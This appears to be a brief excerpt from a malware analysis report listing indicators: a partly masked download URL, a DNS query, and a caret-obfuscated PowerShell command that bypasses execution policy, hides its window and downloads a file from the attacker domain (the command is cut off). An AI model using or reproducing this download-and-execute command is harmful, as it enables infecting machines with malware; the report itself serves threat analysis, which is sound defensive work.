Technical Information
- http://ar####ectureky.bid/user.php?f=##### as %appdata%.exe
- DNS ASK ar####ectureky.bid
- '<SYSTEM32>\cmd.exe' /c pOw^er^sheLl.e^xe ^-^e^xe^cUtiO^NpoL^ic^Y ^B^Ypas^s -n^OP^ROf^ile -w^iNdo^wst^yL^e h^IddeN (ne^w-OBJe^ct sy^st^em.^Ne^t^.webcLi^e^nt)^.dow^nloa^d^F^I^le(^'http://ar####ecture...' (with hidden window)